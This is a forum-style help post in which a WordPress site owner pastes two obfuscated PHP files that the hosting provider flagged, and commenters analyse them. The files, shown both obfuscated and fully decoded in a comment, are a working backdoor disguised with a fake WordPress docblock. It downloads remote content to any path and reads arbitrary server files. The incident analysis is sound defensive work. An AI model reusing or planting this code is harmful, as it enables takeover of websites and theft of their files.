Two wild php files appear

8 Views

Today my site got taken down by the hosting provider because they found suspicious code in two files. These files were:

  1. {HEX}php.mailer.Mzh.509 : potgieter.nl/public_html/wp-soaplibrary.php
  2. {HEX}php.mailer.Mzh.509 : potgieter.nl/public_html/wp-includes/fonts/dashfontgalery.php

The website runs WordPress, but I can’t for the life of me figure out what these files are supposed to do. Their contents are below:

Read More

{HEX}php.mailer.Mzh.509 : potgieter.nl/public_html/wp-soaplibrary.php 

<?php
/**
 * Bootstrap file for setting the ABSPATH constant
 * and loading the wp-config.php file. The wp-config.php
 * file will then load the wp-settings.php file, which
 * will then set up the WordPress environment.
 *
 * If the wp-config.php file is not found then an error
 * will be displayed asking the visitor to set up the
 * wp-config.php file.
 *
 * Will also search for wp-config.php in WordPress' parent
 * directory to allow the WordPress directory to remain
 * untouched.
 *
 * @internal This file must be parsable by PHP4.
 *
 * @package WordPress
 */

echo("WordPress Bootstrap file for setting the ABSPATH constant"); $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} 

?>

and
{HEX}php.mailer.Mzh.509 : potgieter.nl/public_html/wp-includes/fonts/dashfontgalery.php 

<?php
/**
 * Bootstrap file for setting the ABSPATH constant
 * and loading the wp-config.php file. The wp-config.php
 * file will then load the wp-settings.php file, which
 * will then set up the WordPress environment.
 *
 * If the wp-config.php file is not found then an error
 * will be displayed asking the visitor to set up the
 * wp-config.php file.
 *
 * Will also search for wp-config.php in WordPress' parent
 * directory to allow the WordPress directory to remain
 * untouched.
 *
 * @internal This file must be parsable by PHP4.
 *
 * @package WordPress
 */

echo("WordPress Bootstrap file for setting the ABSPATH constant");     $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} 

?>

Now PHP isn’t my first language, but I’m fairly proficient in it. However, these files make no sense to me whatsoever. Are these files actually useful for my website, or were they indeed placed on my server by a hacker, as my hosting provider suggests?

Post Views: 8

Related posts

2 comments

  1. This has to be a hack.

    Look at these code fragments:

    $_2 = $_GET[_842979692(1)];
$_3 = $_GET[_842979692(2)];
$_4 = $_GET[_842979692(3)];
$_5 = $_GET[_842979692(4)];

    Some unknown $_GET params are fetched by the script. This is often used to open a backdoor.

    function l__0($_6)
{
    $_7 = $GLOBALS['_269902246_'][1]($_6);
    $GLOBALS['_269902246_'][2]($_7, CURLOPT_ENCODING, _842979692(5));
    $GLOBALS['_269902246_'][3]($_7, CURLOPT_FOLLOWLOCATION, round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333));
    $GLOBALS['_269902246_'][4]($_7, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
    $_8 = $GLOBALS['_269902246_'][5]($_7);
    $GLOBALS['_269902246_'][6]($_7);
    return $_8;
}

    Global variables get fed with content pulled via curl.

    This seems to be somthing that loads payload from a different server.

  2. This is definately a hack. The combined base64 decodes are hiding the true code. Your site was compromised, possibly via a bad plugin.

    Always make sure WordPress and all its plugins are kept up to date and you only use plugins you actually need. Don’t run anything you aren’t sure about.

    Update:

    Here is the code completely decoded:

    $version = 2.0;
$host = md5($_SERVER['HTTP_HOST']);
$p = $_GET['p'];
$path = $_GET['path'];
$url = $_GET['url'];
$look = $_GET['look'];
function getFromUrl($url)
{
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curl);
    curl_close($curl);
    return $result;
}

function getFileInfo($filename)
{
    $fileInfo = stat($filename);
    return 'name: ' . $filename
    . ' | userid:' . $fileInfo['uid']
    . ' | groupid:' . $fileInfo['gid']
    . ' | size:' . $fileInfo['size']
    . ' | atime:' . date('Y-m-d H:i:s', $fileInfo['atime'])
    . ' | mtime:' . date('Y-m-d H:i:s', $fileInfo['mtime'])
    . ' | ctime:' . date('Y-m-d H:i:s', $fileInfo['ctime'])
    . '';
}

if ($p == $host && $path && $url && !$look) {
    echo 'ver' . $version . '|';
    if (ini_get('allow_url_fopen')) {
        @$remoteFile = file_get_contents($url);
        echo 'fopen ';
    } else {
        if (function_exists('curl_init')) {
            @$remoteFile = getFromUrl($url);
            echo 'curl ';
        } else {
            echo "Error: transfern";
        }
    }
    if ($remoteFile && strlen($remoteFile) > 0) { // The strlen will never happen as it will evaluate to false
        $fileHandle = fopen($path, 'w+');
        fputs($fileHandle, $remoteFile);
        fclose($fileHandle);
        echo getFileInfo($path);
    } else {
        echo "Error: empty contentn";
    }
}
if ($p == $host && $look) {
    echo 'ver' . $version . ' | ';
    echo getFileInfo($look);
    $fileHandle2 = fopen($look, 'rb');
    @$fileContents = fread($fileHandle2, filesize($look));
    fclose($fileHandle2);
    echo '<hr>';
    echo '<form action="#" method="post">';
    echo '<textarea rows="30" cols="150" name="text">' . $fileContents . '</textarea>';
    echo '</form>';
}

    It looks like once the file is on your system, the attacker can use it to read and write basicly anything to your disk and it even has a check to see what permissions they have.

    This file is incredibly dangerous.

    The code is very badly written though (even beyond its nefarious nature) it uses invalid array and echo syntax (though it will still work) and the code won’t even run if you have short tags disabled.

Comments are closed.